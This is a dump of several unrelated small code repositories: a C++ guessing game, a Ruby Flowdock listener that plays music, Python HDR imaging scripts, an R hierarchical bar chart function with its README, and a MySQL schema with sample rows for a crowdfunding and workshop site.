// Copyright (c) 2020 <NAME> All rights reserved
//
// Created by <NAME>
// Created on November 30 2020
// this program checks to see if the number guessed is the magic number
#include <iostream>
int main() {
// this program checks to see if the number guessed is the magic number
const int MAGIC_NUMBER = 5;
int guessed_number;
// input
std::cout << "Enter a number(between 0-9)):";
std::cin >> guessed_number;
std::cout << "" << std::endl;
// process
if (guessed_number == MAGIC_NUMBER) {
// output
std::cout << "Congratulations! You guessed the right number!";
}
}
| 6e6eca681811d130af0fa0109a5c6b5e5e117396 | [
"C++"
] | 1 | C++ | Ryan-Walsh-6/ICS3U-Unit3-02-CPP | 0d051f808d7a1e68c473355b4820cfd6bbd106ef | 9572450e8e53fc97f8083d451cdf523c0b7107c7 |
refs/heads/master | <file_sep># require 'sinatra'
puts 'starting the app..'
require 'httparty'
require 'eventmachine'
require 'em-http'
require 'json'
$api_token = ENV['fd_api_token']
$organization = 'redant'
$flow = 'public-release'
http = EM::HttpRequest.new("https://stream.flowdock.com/flows/#{$organization}/#{$flow}",
:keepalive => true,
:connect_timeout => 0,
:inactivity_timeout => 0
)
class FlowdockResponse
def initialize(json)
@title = json['thread']['title'] if json['thread']
end
def chicken?
if @title
@title.match /:rubber-chicken:/
end
end
end
class MikeMachine
include HTTParty
base_uri 'http://192.168.2.59'
def self.rock_on(track = 1)
get("/play?track=#{track}")
end
def self.noize(level = 20)
get("/level?level=#{level}")
end
end
EventMachine.run do
stream = http.get(:head => {
'Authorization' => [$api_token, ''],
'accept' => 'application/json'
})
buffer = ''
stream.stream do |chunk|
buffer << chunk
while line = buffer.slice!(/.+\r\n/)
response = FlowdockResponse.new(JSON.parse(line))
if response.chicken?
MikeMachine.noize
MikeMachine.rock_on
end
end
end
end
| d3b6e1d4bd89d2ec73d601427c7e6723c5567f34 | [
"Ruby"
] | 1 | Ruby | mcauser/rubber-chickenz | 691b09e8e35df756c8c9ced80385a25c92086c98 | f54ea93f3a0ae62f1b401dd961baccda0a3c8047 |
refs/heads/master | <repo_name>lorabit/cmpe264project1<file_sep>/hdr.py
import cv2
import os
from PIL import Image
from PIL.ExifTags import TAGS
import matplotlib.pyplot as plt
from sklearn import datasets, linear_model
import numpy as np
from math import log
sample_rect = (1300,1300,100,100)
channel = 2
exposure_times = []
sample_values = []
count = 0
g_channels = [1.484, 1.962, 2.308]
# def sample(filename):
# image = cv2.imread('hdr/'+filename)
# ret = 0
# sample_image = np.zeros((sample_rect[2],sample_rect[3],3), np.uint8)
# for i in range(0,sample_rect[2]):
# for j in range(0,sample_rect[3]):
# sample_image[i][j] = [image[i+sample_rect[0]][j+sample_rect[1]][channel]]*3
# ret = ret + image[i+sample_rect[0]][j+sample_rect[1]][channel]
# cv2.imwrite('t/samples/'+str(count)+'_'+str(channel)+'.jpg',sample_image)
# return float(ret)/(sample_rect[2]*sample_rect[3])
def exposure(filename):
image = Image.open('hdr/'+filename)
info = image._getexif()
exposure_time = info[33434]
print(exposure_time)
return float(exposure_time[0])/exposure_time[1]
def linealized(filename,a):
image = cv2.imread('hdr/'+filename)
if a == 1:
return image
new_image = np.zeros(image.shape, np.float)
multipler = [pow(a,1.0/g_channels[k]) for k in range(3)]
for i in range(image.shape[0]):
line = image[i]
for j in range(image.shape[1]):
row = line[j]
for k in range(3):
new_image[i][j][k] = row[k]*multipler[k]
cv2.imwrite('hdr/linealized/'+filename,new_image)
return new_image
def simple_linear(filename):
image = cv2.imread('hdr/'+filename)
new_image = np.zeros(image.shape, np.float)
for i in range(image.shape[0]):
line = image[i]
for j in range(image.shape[1]):
row = line[j]
for k in range(3):
new_image[i][j][k] = pow(row[k],g_channels[k])/pow(255,g_channels[k]-1)
cv2.imwrite('hdr/simple_linear/'+filename,new_image)
return new_image
files = os.listdir('hdr')
valid_files = []
for filename in files:
if filename[-3:].lower()=='jpg':
exposure_times.append(exposure(filename))
valid_files.append(filename)
#Simple Linearization
#After Linearization then creat combined HDR image by ziqiang
imgs = []
for filename in valid_files:
imgs.append(simple_linear(filename))
HDR_img_method_1 = np.zeros(imgs[0].shape, np.float32)
HDR_img_method_2 = np.zeros(imgs[0].shape, np.float32)
HDR_img_method_3 = np.zeros(imgs[0].shape, np.float32)
threshold = 200
for i in range(len(imgs[0])):
for j in range(len(imgs[0][0])):
for k in range(len(imgs[0][0][0])):
if imgs[2][i][j][k] < threshold:
HDR_img_method_1[i][j][k] = imgs[2][i][j][k] * (exposure_times[0]/exposure_times[2])
elif imgs[1][i][j][k] <threshold:
HDR_img_method_1[i][j][k] = imgs[1][i][j][k] * (exposure_times[0]/exposure_times[1])
else:
HDR_img_method_1[i][j][k] = imgs[0][i][j][k]
cv2.imwrite('hdr/combined/HDR_img_method_1.jpg',HDR_img_method_1)
for i in range(len(imgs[0])):
for j in range(len(imgs[0][0])):
for k in range(len(imgs[0][0][0])):
s = imgs[0][i][j][k]
n = 1
if imgs[2][i][j][k] < threshold:
n = n +1
s = s + imgs[2][i][j][k] * (exposure_times[0]/exposure_times[2])
if imgs[1][i][j][k] <threshold:
n = n + 1
s = s + imgs[1][i][j][k] * (exposure_times[0]/exposure_times[1])
HDR_img_method_2[i][j][k] = s/n
cv2.imwrite('hdr/combined/HDR_img_method_2.jpg',HDR_img_method_2)
a1 = exposure_times[1]/exposure_times[0]
a2 = exposure_times[2]/exposure_times[0]
weight1 = 1/(pow(a1,2))
weight2 = 1/(pow(a2,2))
for i in range(len(imgs[0])):
for j in range(len(imgs[0][0])):
for k in range(len(imgs[0][0][0])):
s = imgs[0][i][j][k]
n = 1
if imgs[2][i][j][k] < threshold:
n = n + weight2
s = s + weight2 * imgs[2][i][j][k] * (exposure_times[0]/exposure_times[2])
if imgs[1][i][j][k] <threshold:
n = n + weight1
s = s + weight1 * imgs[1][i][j][k] * (exposure_times[0]/exposure_times[1])
HDR_img_method_3[i][j][k] = s/n
cv2.imwrite('hdr/combined/HDR_img_method_3.jpg',HDR_img_method_3)
# tone map ziqiang
gam_value = 2.2
tonemap1 = cv2.createTonemapDurand(gamma=gam_value)
res_tonemap1 = tonemap1.process(HDR_img_method_1.copy())
res_tonemap1_8bit = np.clip(res_tonemap1*255, 0, 255).astype('uint8')
cv2.imwrite("hdr/tonemapped/res_tonemap1_8bit.jpg", res_tonemap1_8bit)
tonemap2 = cv2.createTonemapDurand(gamma=gam_value)
res_tonemap2 = tonemap2.process(HDR_img_method_2.copy())
res_tonemap2_8bit = np.clip(res_tonemap2*255, 0, 255).astype('uint8')
cv2.imwrite("hdr/tonemapped/res_tonemap2_8bit.jpg", res_tonemap2_8bit)
tonemap3 = cv2.createTonemapDurand(gamma=gam_value)
res_tonemap3 = tonemap3.process(HDR_img_method_3.copy())
res_tonemap3_8bit = np.clip(res_tonemap3*255, 0, 255).astype('uint8')
cv2.imwrite("hdr/tonemapped/res_tonemap3_8bit.jpg", res_tonemap3_8bit)
# Average HDR
# dest_exposure_time = 1.0/10.0
# print('linealizing image 0...')
# img1 = linealized(valid_files[0],dest_exposure_time/exposure_times[0])
# print('linealizing image 1...')
# img2 = linealized(valid_files[1],dest_exposure_time/exposure_times[1])
# print('linealizing image 2...')
# img3 = linealized(valid_files[2],dest_exposure_time/exposure_times[2])
# print('generating HDR image...')
# new_image = np.zeros(img1.shape, np.float)
# for i in range(img1.shape[0]):
# for j in range(img1.shape[1]):
# for k in range(3):
# new_image[i][j][k] = (img1[i][j][k] + img2[i][j][k] + img3[i][j][k])/3
# cv2.imwrite('hdr/linealized/avg.jpg',new_image)
<file_sep>/test.py
import cv2
print"hello workd"
img = cv2.imread('images/0.3_100.JPG',0)
cv2.imshow('window_name',img)
cv2.waitKey(5000)
cv2.destroyAllWindows()
<file_sep>/README.md
# Requirements
1. OpenCV with contrib
2. numpy
3. sklearn
4. matplotlib
5. pillow
6. Python 2.7
# Part 1
Before you run p1.py, you may need to edit this file to adjust some parameters as follow:
1. sample_rect: a array of 4 elements indicating the position(x,y) and size(height,width) of simpling area. In our case, we set it to (1300,1300,100,100).
2. channel: a int specifying which channel we are dealing with. 0 for Blue, 1 for Green and 2 for Red.
Then, you can get linear regression and its plot by running p1.py.
# Part 3&4
In part 3 we generate HDR composite images with three different algorithms as required, and part 4 we make tone map images of the three outputs from three HDR composite algorithms. So we write the part 3 and part 4 in the hdr.py such that we could acquire the result of simple_linear() function to do HDR composite and then make use of HDR composite results to do tone map.
Before you run hdr.py, you may need to madify the following paremeters if you need:
1. threshold: this is the value we use to determine whether the pixel value is sturated in the HDR composite algorithms. We tried a lot of times that the 255 is not ideal value, so we set the value to be 200 as the default value in the hdr.py, you may modify the value if you want to see different outputs image from the HDR composite algorithm.
2. gam_value: When we use the tone map function, there is a gamma correction parameter gamma need to be set, we read from the OpenCV API that the gamma is positive value of type float. Generally speaking, if gamma > 1 the function will brighten the image, if gamma < 1 the function will darken the image. The gamma value of 1.0 implies no correction, $gamma$ equal to 2.2 is suitable for most displays. We set 2.2 to be the default value in hdr.py, you may change the value if you would like to see different outputs of tone map function.
After you run hdr.py, you may find the output images in the following directories:
1. /hdr/combined: the outputs of three HDR comosite algorithms will be saved in this directory.
2. /hdr/tonemapped: the outputs of the tone map function for three HDR composite algorithms will be saved in this directory.
<file_sep>/p1.py
import cv2
import os
from PIL import Image
from PIL.ExifTags import TAGS
import matplotlib.pyplot as plt
from sklearn import datasets, linear_model
import numpy as np
from math import log
sample_rect = (1300,1300,100,100)
channel = 2
exposure_times = []
sample_values = []
count = 0
def sample(filename):
image = cv2.imread('t/'+filename)
ret = 0
sample_image = np.zeros((sample_rect[2],sample_rect[3],3), np.uint8)
for i in range(0,sample_rect[2]):
for j in range(0,sample_rect[3]):
sample_image[i][j] = [image[i+sample_rect[0]][j+sample_rect[1]][channel]]*3
ret = ret + image[i+sample_rect[0]][j+sample_rect[1]][channel]
cv2.imwrite('t/samples/'+str(count)+'_'+str(channel)+'.jpg',sample_image)
return float(ret)/(sample_rect[2]*sample_rect[3])
def exposure(filename):
    """Return the exposure time (seconds) read from the EXIF data of t/<filename>.

    EXIF tag 33434 (ExposureTime) is returned by older Pillow versions as a
    (numerator, denominator) tuple, but by newer versions as an IFDRational or
    float, where subscripting would raise; both forms are handled here.

    Raises KeyError if the image carries no ExposureTime tag.
    """
    image = Image.open('t/' + filename)
    info = image._getexif()      # NOTE: private API; returns {tag_id: value}
    exposure_time = info[33434]  # 33434 == ExposureTime
    print(exposure_time)
    if isinstance(exposure_time, tuple):
        return float(exposure_time[0]) / exposure_time[1]
    return float(exposure_time)
# Collect (log exposure time, log mean brightness) pairs from every JPEG in ./t.
# NOTE(review): indentation of the loop body appears to have been stripped in
# this dump — restore it before running.
files = os.listdir('t')
for filename in files:
if filename[-3:].lower()=='jpg':
exposure_times.append(log(exposure(filename)))
sample_values.append(log(sample(filename)))
count = count + 1
print(exposure_times)
print(sample_values)
# Fit log(B') = g*log(T) + b with least squares; the slope estimates the
# camera response exponent g.
regr = linear_model.LinearRegression()
# Train the model using the training sets
train_x = np.array(exposure_times).reshape(len(exposure_times),1)
train_y = np.array(sample_values).reshape(len(sample_values),1)
regr.fit(train_x, train_y)
# The coefficients
print(regr.coef_)
g = regr.coef_[0][0]
print(1/g)
print(regr.intercept_)
# Mean squared error of the fit on the training points.
print(np.mean((regr.predict(train_x) - train_y) ** 2))
fited_x = train_x
fited_y = regr.predict(fited_x)
# Scatter the raw samples and overlay the fitted regression line.
plt.scatter(exposure_times,sample_values,color ='Red')
plt.plot(fited_x,fited_y)
plt.plot()
plt.xlabel('T(s)')
plt.ylabel('B\'^g')
plt.show()
# for tag, value in info.items():
# decoded = TAGS.get(tag, tag)
# print(decoded)
# print(tag)
| 31f578a69a0ed10254180636381b36d4b2211136 | [
"Markdown",
"Python"
] | 4 | Python | lorabit/cmpe264project1 | a425831a0dbf12f8c3d7eb0cd7f292d2b1e7f7b7 | 1f630b185560e939ac16bed3bd38d0c0754b513e |
refs/heads/master | <repo_name>JohnnyPeng123/hierarchical_bar_chart-<file_sep>/hbar.r
# Build a hierarchical bar chart (d3 "hierarchical bar chart") from `data`.
#
# Arguments:
#   data         - a data.table/data.frame with the raw observations
#   groupings    - character vector of category columns, highest to lowest level
#   method       - aggregation method: "count", "sum" or "mean"
#   left_margin  - left white space (px) reserved for labels
#   font_size    - font size (px) for all chart text
#   ticks_width  - spacing (px) between x-axis ticks
#   num_variable - numeric column to aggregate when method != "count"
#   na.rm        - whether to drop NAs during aggregation
#
# Returns an r2d3 htmlwidget.
hbar <- function(data, groupings, method, left_margin = 200, font_size = 15,
                 ticks_width = 100, num_variable = NULL, na.rm = T) {
  # Aggregate the raw data down to one row per leaf combination.
  if (method == "count") {
    data_agg <- data %>% group_by(.dots = groupings) %>% summarise(count = n()) %>% data.table()
  } else if (method == "sum" & !is.null(num_variable)) {
    # BUGFIX: na.rm must be an argument of sum(), not of summarise() — the old
    # placement never removed NAs and added a stray `na.rm` column.
    data_agg <- data %>% group_by(.dots = groupings) %>% summarise(sum = sum(!!sym(num_variable), na.rm = na.rm)) %>% data.table()
  } else if (method == "mean" & !is.null(num_variable)) {
    # BUGFIX: same na.rm placement fix for mean().
    data_agg <- data %>% group_by(.dots = groupings) %>% summarise(mean = mean(!!sym(num_variable), na.rm = na.rm)) %>% data.table()
  }
  # The d3 script expects a nested list: list(name = ..., children = list(...)).
  output <- list()
  output$name <- "data"
  # For each hierarchy level, build the "$children[[i]]..." accessor string
  # that locates every aggregated row inside the nested output list, then
  # assign node names (and, at the deepest level, the values) via eval/parse.
  for (var in 1:length(groupings)) {
    eval(parse(text = paste0("data_agg[,'syntax", var, "']<-NA")))
    for (children in 1:length(unique(unlist(data_agg[,..var])))) {
      eval(parse(text = paste0(
        "data_agg[,'syntax_temp']<-rep(unique(data_agg[,", var, "])[", children, "],nrow(data_agg))"
      )))
      eval(parse(text = paste0(
        "data_agg[,'syntax", var, "']", "<-ifelse(data_agg[,", var, "]==data_agg[,'syntax_temp'],'$children[[", children, "]]',unlist(data_agg[,'syntax", var, "']))"
      )))
    }
    if (var > 1) {
      # Prefix with the parent level's accessor so the path is absolute.
      eval(parse(text = paste0(
        "data_agg[,'syntax", var, "']<-paste0(", "unlist(data_agg[,'syntax", var - 1, "']),unlist(data_agg[,'syntax", var, "']))"
      )))
    }
    eval(parse(text = paste0(
      "names <- unique(data_agg[,c('syntax", var, "',..groupings[", var, "],'", method, "')])"
    )))
    # Order nodes by the numeric child indices embedded in the accessor string.
    eval(parse(text = paste0(
      "names$syntax_order", " <- as.numeric(gsub('[^0-9.-]','',names$syntax", var, "))"
    )))
    names <- names[order(syntax_order)]
    for (row in nrow(names):1) {
      eval(parse(text = paste0(
        "output", names[row, 1], "$name[1]<-unlist(names[", row, ",2])"
      )))
    }
    if (var == length(groupings)) {
      # Deepest level: attach the aggregated value to each leaf node.
      for (row in nrow(names):1) {
        eval(parse(text = paste0(
          "output", names[row, 1], "$value[1]<-unlist(names[", row, ",3])"
        )))
      }
    }
  }
  # Drop the NULL placeholders created while growing the nested list.
  output <- list.clean(output, fun = is.null, recursive = T)
  # Patch the default margins/sizes inside the remote d3 script, then render.
  return(suppressWarnings(r2d3(data = output, script = gsub("10px", paste0(as.character(font_size), "px"),
    gsub("/ 80", paste0("/ ", as.character(ticks_width)),
    gsub(", 20", paste0(", ", as.character(font_size)),
    gsub("left: 100", paste0("left: ", as.character(left_margin)),
    readLines("https://raw.githubusercontent.com/JohnnyPeng123/hierarchical_bar_chart-/master/hbar.js")
  ))))
  )))
}
<file_sep>/demo.r
# Load the packages required by hbar(): r2d3 (rendering), data.table and
# dplyr (aggregation), and rlist (nested-list cleanup).
library(r2d3)
library(data.table)
library(dplyr)
library(rlist)
# Pull the hbar() function definition straight from GitHub.
source("https://raw.githubusercontent.com/JohnnyPeng123/hierarchical_bar_chart-/master/hbar.r")
# Read in sample data file
data <- setDT(read.csv("https://raw.githubusercontent.com/JohnnyPeng123/hierarchical_bar_chart-/master/aug_train.csv"))
# Recode the 0/1 target into readable labels for the chart.
data$target <- ifelse(data$target==1,"Looking for a job","Not looking for a job")
# Specify the hierarchical relationship
groupings <- c("target","last_new_job","relevent_experience","education_level")
# Generate and view the hierarchical bar chart
chart <- hbar(data,groupings,method="count",left_margin=200,font_size=15,ticks_width=100, num_variable=NULL,na.rm=T)
chart
<file_sep>/README.md
# Hierarchical Bar Chart (hbar chart) in R
Original visualization by @mbostock (<NAME>), from:
https://observablehq.com/@d3/hierarchical-bar-chart

I was amazed by this visualization, and I would like to create the same vis in R. (R is the primary language that I use for work)
so I have created this "hbar" function to replicate this visualization in R environment.
# How to Use the "hbar" function
A quick demo on how to use this "hbar" function to generate hierarchical bar chart in R:
https://github.com/JohnnyPeng123/hierarchical_bar_chart-/blob/master/demo.r
"hbar" function has 3 required arguments:
1. data - A data.table object in the R environment that contains the data that will be used to generate hbar chart.
2. groupings - A vector of strings that contains the names of the categorical variables that will form a hierarchical relationship, from left to right, representing the highest to the lowest level in this hierarchical relationship.
3. method - the method used to perform aggregation; you can use either "count" or "sum". Although "mean" is also available, its output will not make sense at this stage; I am planning to show the average/median value as a dot/line on top of the bars in the future.
And 5 optional arguments with default value:
1. left_margin (default = 200) - the amount of white space on the left reserved for displaying the texts
2. font_size (default = 15) - size of the fonts for all the texts displayed in the graph
3. ticks_width (default = 100) - width between the ticks on the x-axis
4. num_variable (default = NULL) - if method does not equal to "count", you can use this to specify a numeric variable that should be used for aggregation.
5. na.rm (default = T) - whether or not to remove observations with missing values during aggregation.
# Files in this Repo
0. README.md documentation
1. aug_train.csv - A sample data file that I used to develop this function.
It was downloaded from "https://www.kaggle.com/arashnic/hr-analytics-job-change-of-data-scientists"
2. hbar.js - JavaScript that used to generate the hbar, slightly modified from the original ones by <NAME>
3. hbar.r - R function named "hbar" that produce hbar chart in R environment leveraging "r2d3" package and the original D3.js by <NAME>
4. demo.r - a simple use case to demonstration how to use the hbar.r function to generate hbar chart.
| 9a4b6e05f5f5a0309901f3d6932f136dc4567f70 | [
"Markdown",
"R"
] | 3 | R | JohnnyPeng123/hierarchical_bar_chart- | 6e16d8761675ce47475b53da21501fe18a085dd4 | 0a90a6e4735a83a4cd7411b46a2297687d921ede |
refs/heads/master | <repo_name>Irwin99/microsite-bpt<file_sep>/db_vorcee.sql
-- phpMyAdmin SQL Dump
-- version 4.4.12
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1
-- Generation Time: 09 Des 2016 pada 14.08
-- Versi Server: 5.6.25
-- PHP Version: 5.6.11
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `db_vorcee`
--
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_ads`
--
CREATE TABLE IF NOT EXISTS `vc_ads` (
`id_ads` int(11) NOT NULL,
`name_ads` varchar(100) NOT NULL,
`image_ads` varchar(200) NOT NULL,
`link_ads` varchar(200) NOT NULL,
`description_ads` longtext NOT NULL,
`fee_ads` decimal(10,0) NOT NULL,
`price_ads` decimal(10,0) NOT NULL,
`current_price` decimal(10,0) NOT NULL,
`date_ads` datetime NOT NULL,
`id_user` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_banner`
--
CREATE TABLE IF NOT EXISTS `vc_banner` (
`id_banner` int(11) NOT NULL,
`title_banner` varchar(150) NOT NULL,
`image_banner` varchar(200) NOT NULL,
`caption_banner` longtext NOT NULL,
`link_banner` varchar(200) NOT NULL,
`id_user` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_category`
--
CREATE TABLE IF NOT EXISTS `vc_category` (
`id_category` int(11) NOT NULL,
`name_category` varchar(200) NOT NULL,
`image_category` varchar(200) NOT NULL
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=latin1;
--
-- Dumping data untuk tabel `vc_category`
--
INSERT INTO `vc_category` (`id_category`, `name_category`, `image_category`) VALUES
(1, 'fashion', ''),
(2, 'Performace Art', ''),
(3, 'Craft', ''),
(4, 'Design', ''),
(5, 'Media', ''),
(6, 'Music', ''),
(7, 'Publishing', ''),
(8, 'Advertising', ''),
(9, 'Art Market', ''),
(10, 'Architecture', ''),
(11, 'Computer', ''),
(12, 'Research Development', '');
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_class`
--
CREATE TABLE IF NOT EXISTS `vc_class` (
`id_class` int(11) NOT NULL,
`date_class` date NOT NULL,
`place_class` varchar(100) NOT NULL,
`time_class` varchar(100) NOT NULL,
`title_class` varchar(100) NOT NULL,
`description_class` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_hit_ads`
--
CREATE TABLE IF NOT EXISTS `vc_hit_ads` (
`id_hit_ads` bigint(20) NOT NULL,
`id_ads` int(11) NOT NULL,
`id_user` int(11) NOT NULL,
`ip_address` varchar(20) NOT NULL,
`date_hit` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_order`
--
CREATE TABLE IF NOT EXISTS `vc_order` (
`id_order` bigint(20) NOT NULL,
`id_product` int(11) NOT NULL,
`id_user` int(11) NOT NULL,
`id_payment` int(11) NOT NULL,
`date_order` int(11) NOT NULL,
`status_order` tinyint(4) NOT NULL COMMENT '0: Pending, 1: Process, 2: Done'
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_payment`
--
CREATE TABLE IF NOT EXISTS `vc_payment` (
`id_payment` int(11) NOT NULL,
`name_payment` varchar(200) NOT NULL,
`account_name` varchar(200) NOT NULL,
`account_number` varchar(20) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_product`
--
CREATE TABLE IF NOT EXISTS `vc_product` (
`id_product` int(11) NOT NULL,
`id_campaigner` int(11) NOT NULL,
`id_admin` int(11) NOT NULL,
`id_category` int(11) NOT NULL,
`name_product` varchar(200) NOT NULL,
`start_price` decimal(10,0) NOT NULL,
`current_price` decimal(10,0) NOT NULL,
`image_product` varchar(200) NOT NULL,
`about_product` longtext NOT NULL,
`dimension` varchar(100) NOT NULL,
`material` varchar(100) NOT NULL,
`date_product` datetime NOT NULL,
`date_end_campaign` datetime NOT NULL,
`status_product` tinyint(1) NOT NULL COMMENT '0: Pending, 1: Active, 2: Sold, 3: Rejected',
`date_mod` date NOT NULL,
`place_mod` varchar(100) NOT NULL,
`time_mod` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_setting`
--
CREATE TABLE IF NOT EXISTS `vc_setting` (
`id_setting` int(11) NOT NULL,
`about` longtext NOT NULL,
`phone_number` varchar(15) NOT NULL,
`title_website` varchar(100) NOT NULL,
`campaign_report` longtext NOT NULL,
`achievement` longtext NOT NULL,
`address` longtext NOT NULL,
`partner` longtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_tip`
--
CREATE TABLE IF NOT EXISTS `vc_tip` (
`id_tip` bigint(20) NOT NULL,
`id_user` int(11) NOT NULL,
`id_product` int(11) NOT NULL,
`tip` decimal(10,0) NOT NULL,
`date_tip` datetime NOT NULL,
`status_tip` tinyint(1) NOT NULL COMMENT '0: Pending, 1: Win, 2: Loose'
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_user`
--
CREATE TABLE IF NOT EXISTS `vc_user` (
`id_user` int(11) NOT NULL,
`username` varchar(20) NOT NULL,
`password` char(32) NOT NULL,
`full_name` varchar(100) NOT NULL,
`avatar` varchar(100) NOT NULL,
`email` varchar(100) NOT NULL,
`address` longtext NOT NULL,
`gender` tinyint(1) NOT NULL COMMENT '0: Note Set, 1: Male, 2: Female',
`phone_number` varchar(20) NOT NULL,
`mobile` varchar(100) NOT NULL,
`country` varchar(100) NOT NULL,
`province` varchar(100) NOT NULL,
`city` varchar(100) NOT NULL,
`about_user` longtext NOT NULL,
`organization_name` varchar(100) NOT NULL,
`status_user` tinyint(1) NOT NULL COMMENT '0: Nonactive, 1: Active, 2: Banned',
`permission` tinyint(1) NOT NULL COMMENT '0: Creator, 1: Admin, 2: Learner',
`date_register` datetime NOT NULL,
`date_login` datetime NOT NULL,
`contact_person` varchar(100) NOT NULL
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=latin1;
--
-- Dumping data untuk tabel `vc_user`
--
INSERT INTO `vc_user` (`id_user`, `username`, `password`, `full_name`, `avatar`, `email`, `address`, `gender`, `phone_number`, `mobile`, `country`, `province`, `city`, `about_user`, `organization_name`, `status_user`, `permission`, `date_register`, `date_login`, `contact_person`) VALUES
(1, 'admin', '<PASSWORD>', 'zuhdi', '', '', '', 1, '', '', '', '', '', '', '', 1, 1, '2016-08-03 12:24:33', '0000-00-00 00:00:00', ''),
(2, 'vorcee', 'a8f5f167f44f4964e6c998dee827110c', '<NAME>', 'asset/images/user/1.jpg', '<EMAIL>', 'Bsd Cipondoh', 0, '08123123123', '', 'Indonesia', 'Jabar', 'jakarta', 'Namaku Diena Adyanthy , saya tinggal di bsd , saya seorang artis ternama , semua orang kenal saya , bahkan kalo saya keluar paparazi dimana mana hahaha, itulah saya :)', '', 1, 2, '2016-08-01 12:16:47', '0000-00-00 00:00:00', ''),
(3, 'andien', 'asdasd', '<NAME>', 'asset/images/user/andien.jpg', '<EMAIL>', 'jalan kavling ui', 0, '08123123123', '', 'Indonesia', 'Jabar', 'Bandung', 'artis', '', 1, 0, '2016-10-13 06:14:51', '0000-00-00 00:00:00', ''),
(4, 'hihooxz', '7815696ecbf1c96e6894b779456d330e', '', '', '<EMAIL>', '', 0, '', '', '', '', '', '', '', 0, 2, '2016-12-09 11:35:21', '0000-00-00 00:00:00', '');
-- --------------------------------------------------------
--
-- Struktur dari tabel `vc_workshop`
--
CREATE TABLE IF NOT EXISTS `vc_workshop` (
`id_workshop` int(11) NOT NULL,
`id_category` int(11) NOT NULL,
`workshop_title` varchar(200) NOT NULL,
`workshop_description` longtext NOT NULL,
`image_workshop` varchar(200) NOT NULL,
`course_fee` int(11) NOT NULL,
`hour_start` varchar(200) NOT NULL,
`hour_end` varchar(200) NOT NULL,
`date_workshop` date NOT NULL,
`date_insert` date NOT NULL
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
--
-- Dumping data untuk tabel `vc_workshop`
--
INSERT INTO `vc_workshop` (`id_workshop`, `id_category`, `workshop_title`, `workshop_description`, `image_workshop`, `course_fee`, `hour_start`, `hour_end`, `date_workshop`, `date_insert`) VALUES
(1, 1, 'fashion good', 'fashion is gooda', 'asset/images/workshop/asos4.jpg', 100000, '12:30 PM', '15:00 PM', '2016-11-15', '2016-11-16');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `vc_ads`
--
ALTER TABLE `vc_ads`
ADD PRIMARY KEY (`id_ads`);
--
-- Indexes for table `vc_banner`
--
ALTER TABLE `vc_banner`
ADD PRIMARY KEY (`id_banner`);
--
-- Indexes for table `vc_category`
--
ALTER TABLE `vc_category`
ADD PRIMARY KEY (`id_category`);
--
-- Indexes for table `vc_class`
--
ALTER TABLE `vc_class`
ADD PRIMARY KEY (`id_class`);
--
-- Indexes for table `vc_hit_ads`
--
ALTER TABLE `vc_hit_ads`
ADD PRIMARY KEY (`id_hit_ads`);
--
-- Indexes for table `vc_order`
--
ALTER TABLE `vc_order`
ADD PRIMARY KEY (`id_order`);
--
-- Indexes for table `vc_payment`
--
ALTER TABLE `vc_payment`
ADD PRIMARY KEY (`id_payment`);
--
-- Indexes for table `vc_product`
--
ALTER TABLE `vc_product`
ADD PRIMARY KEY (`id_product`);
--
-- Indexes for table `vc_setting`
--
ALTER TABLE `vc_setting`
ADD PRIMARY KEY (`id_setting`);
--
-- Indexes for table `vc_tip`
--
ALTER TABLE `vc_tip`
ADD PRIMARY KEY (`id_tip`);
--
-- Indexes for table `vc_user`
--
ALTER TABLE `vc_user`
ADD PRIMARY KEY (`id_user`);
--
-- Indexes for table `vc_workshop`
--
ALTER TABLE `vc_workshop`
ADD PRIMARY KEY (`id_workshop`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `vc_ads`
--
ALTER TABLE `vc_ads`
MODIFY `id_ads` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_banner`
--
ALTER TABLE `vc_banner`
MODIFY `id_banner` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_category`
--
ALTER TABLE `vc_category`
MODIFY `id_category` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=13;
--
-- AUTO_INCREMENT for table `vc_class`
--
ALTER TABLE `vc_class`
MODIFY `id_class` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_hit_ads`
--
ALTER TABLE `vc_hit_ads`
MODIFY `id_hit_ads` bigint(20) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `vc_order`
--
ALTER TABLE `vc_order`
